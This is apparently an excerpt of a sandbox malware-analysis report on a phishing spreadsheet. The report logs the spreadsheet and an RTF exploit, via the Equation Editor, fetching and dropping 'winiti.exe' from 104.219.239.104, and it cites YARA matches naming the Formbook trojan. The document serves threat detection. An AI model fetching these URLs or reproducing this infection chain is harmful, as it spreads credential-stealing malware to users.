              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: excel.exe Memory has grown: Private usage: 4MB later: 37MB
              Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 11:40:27 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Tue, 16 Jul 2024 19:13:36 GMT ETag: "e8400-61d6224798859" Accept-Ranges: bytes Content-Length: 951296 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewASN Name: DATAWAGONUS DATAWAGONUS
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: global trafficHTTP traffic detected: GET /dGa HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: tny.wtfConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xampp/bn/recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.219.239.104Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /80/winiti.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.219.239.104Connection: Keep-Alive
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\37D00239.emfJump to behavior
              Source: global trafficDNS traffic detected: DNS query: tny.wtf
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 11:40:21 GMTTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oUDIJoRUGvNJ0PNTuX7ZUsOG4uZhD8nTjir3U26jCZtfdcUpt6EmhafoL32hISzG0PbtgJUL0prVl%2Fji9sHwKu5fBApgukv%2Br9j%2Fzuq4ZC0URzfg%2BiMWXLxb"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a941d47ceed5e79-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 11:40:21 GMTTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=plG0JCxoAKlGuo26MmlKyEXJVvVj%2Bf8tpWJBrWUSZ3eXFfejgYUVbeskNpEmJSH%2BakRDz19hd20DkL%2FpH1JaNAwp5VGCQQPRxFCVOvviqJ2ml9WAn2waQIV3"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a941d4bd98e5e79-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 11:40:21 GMTTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4C56WPN0iN%2BgthEsRjYJrauRNBV%2Fd69qyhca%2BS7uZjfxTCL8Vo3zKLLqIuYan2fHzuwtUXcrHOw9DLlQOPcmMGD%2BkuYSBo2Vv%2Fzf2FhSQMa3CYQyt1MXo6V2"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a941d4cca2b5e79-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 11:40:26 GMTTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2DK4%2FPYBA3If48iGooDP%2FeqPPqpoWJk9HuUhYKOLu4FxKJSb9kjv1sVS5SkTDG5iGgEFUGpvLyB0MYLuJxNFIpYgJowS%2FFE2o9HXFcYNFfo9Nom4%2BMylFrR%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a941d6abcb67ca2-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
              Source: EQNEDT32.EXEString found in binary or memory: http://104.219.239.104/80/winiti.exe
              Source: EQNEDT32.EXE, 00000007.00000002.412730968.00000000005C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.219.239.104/80/winiti.exeRe
              Source: EQNEDT32.EXE, 00000007.00000002.412730968.00000000005C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.219.239.104/80/winiti.exej
              Source: EQNEDT32.EXE, 00000007.00000002.412730968.00000000005C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.219.239.104/80/winiti.exekkC:
              Source: EQNEDT32.EXE, 00000007.00000002.412730968.00000000005C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.219.239.104/80/winiti.exelay
              Source: tny.wtf.url.3.drString found in binary or memory: http://tny.wtf/
              Source: RFQ#51281AOLAI.xls, dGa.url.3.drString found in binary or memory: http://tny.wtf/dGa
              Source: 07330000.0.dr, ~DFA2DBDD95D657A82C.TMP.0.drString found in binary or memory: http://tny.wtf/dGayX

              E-Banking Fraud

              Source: Yara matchFile source: 9.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000009.00000002.489032107.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.488998294.0000000000150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

              System Summary

              Source: 9.2.winiti.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 9.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000009.00000002.489032107.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000009.00000002.488998294.0000000000150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FFE27256.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
              Source: RFQ#51281AOLAI.xlsOLE: Microsoft Excel 2007+
              Source: 07330000.0.drOLE: Microsoft Excel 2007+
              Source: ~DF6D5A74146301A5A1.TMP.0.drOLE: Microsoft Excel 2007+
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\dGa.urlJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\tny.wtf.urlJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winiti[1].exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\winiti.exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0042BEE3 NtClose,9_2_0042BEE3
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008E07AC NtCreateMutant,LdrInitializeThunk,9_2_008E07AC
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DF9F0 NtClose,LdrInitializeThunk,9_2_008DF9F0
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFAE8 NtQueryInformationProcess,LdrInitializeThunk,9_2_008DFAE8
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFB68 NtFreeVirtualMemory,LdrInitializeThunk,9_2_008DFB68
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFDC0 NtQuerySystemInformation,LdrInitializeThunk,9_2_008DFDC0
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008E00C4 NtCreateFile,9_2_008E00C4
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008E0048 NtProtectVirtualMemory,9_2_008E0048
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008E0060 NtQuerySection,9_2_008E0060
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008E0078 NtResumeThread,9_2_008E0078
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008E01D4 NtSetValueKey,9_2_008E01D4
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008E010C NtOpenDirectoryObject,9_2_008E010C
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008E0C40 NtGetContextThread,9_2_008E0C40
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008E10D0 NtOpenProcessToken,9_2_008E10D0
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008E1148 NtOpenThread,9_2_008E1148
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DF8CC NtWaitForSingleObject,9_2_008DF8CC
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DF900 NtReadFile,9_2_008DF900
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DF938 NtWriteFile,9_2_008DF938
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008E1930 NtSetContextThread,9_2_008E1930
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFAB8 NtQueryValueKey,9_2_008DFAB8
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFAD0 NtAllocateVirtualMemory,9_2_008DFAD0
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFA20 NtQueryInformationFile,9_2_008DFA20
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFA50 NtEnumerateValueKey,9_2_008DFA50
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFBB8 NtQueryInformationToken,9_2_008DFBB8
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFBE8 NtQueryVirtualMemory,9_2_008DFBE8
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFB50 NtCreateKey,9_2_008DFB50
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFC90 NtUnmapViewOfSection,9_2_008DFC90
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFC30 NtOpenProcess,9_2_008DFC30
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFC48 NtSetInformationFile,9_2_008DFC48
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFC60 NtMapViewOfSection,9_2_008DFC60
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFD8C NtDelayExecution,9_2_008DFD8C
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008E1D80 NtSuspendThread,9_2_008E1D80
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFD5C NtEnumerateKey,9_2_008DFD5C
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFEA0 NtReadVirtualMemory,9_2_008DFEA0
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFED0 NtAdjustPrivilegesToken,9_2_008DFED0
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFE24 NtWriteVirtualMemory,9_2_008DFE24
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFFB4 NtCreateSection,9_2_008DFFB4
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFFFC NtCreateProcessEx,9_2_008DFFFC
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFF34 NtQueueApcThread,9_2_008DFF34
              Source: RFQ#51281AOLAI.xlsOLE indicator, VBA macros: true
              Source: ~DF6D5A74146301A5A1.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
              Source: ~WRF{0F8425F3-6468-4181-A134-C6330FCC02D5}.tmp.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winiti[1].exe 434EC59B680788BAE7F2935200A77E681CECBB517D853C6E6CF31F4CF112E5CC
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\winiti.exe 434EC59B680788BAE7F2935200A77E681CECBB517D853C6E6CF31F4CF112E5CC
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: String function: 008EE2A8 appears 60 times
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: String function: 0095F970 appears 84 times
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: String function: 0093373B appears 253 times
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: String function: 00933F92 appears 132 times
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: String function: 008EDF5C appears 137 times
              Source: 9.2.winiti.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 9.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000009.00000002.489032107.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000009.00000002.488998294.0000000000150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FFE27256.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
              Source: winiti[1].exe.7.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: winiti.exe.7.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 8.2.winiti.exe.590000.0.raw.unpack, VU5FiiciHrPuThVwBQ.csCryptographic APIs: 'CreateDecryptor'
              Source: 8.2.winiti.exe.289505c.4.raw.unpack, VU5FiiciHrPuThVwBQ.csCryptographic APIs: 'CreateDecryptor'
              Source: 8.2.winiti.exe.3c78a18.5.raw.unpack, hNFj00Hv45CTOkfqEI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 8.2.winiti.exe.ed0000.2.raw.unpack, hNFj00Hv45CTOkfqEI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
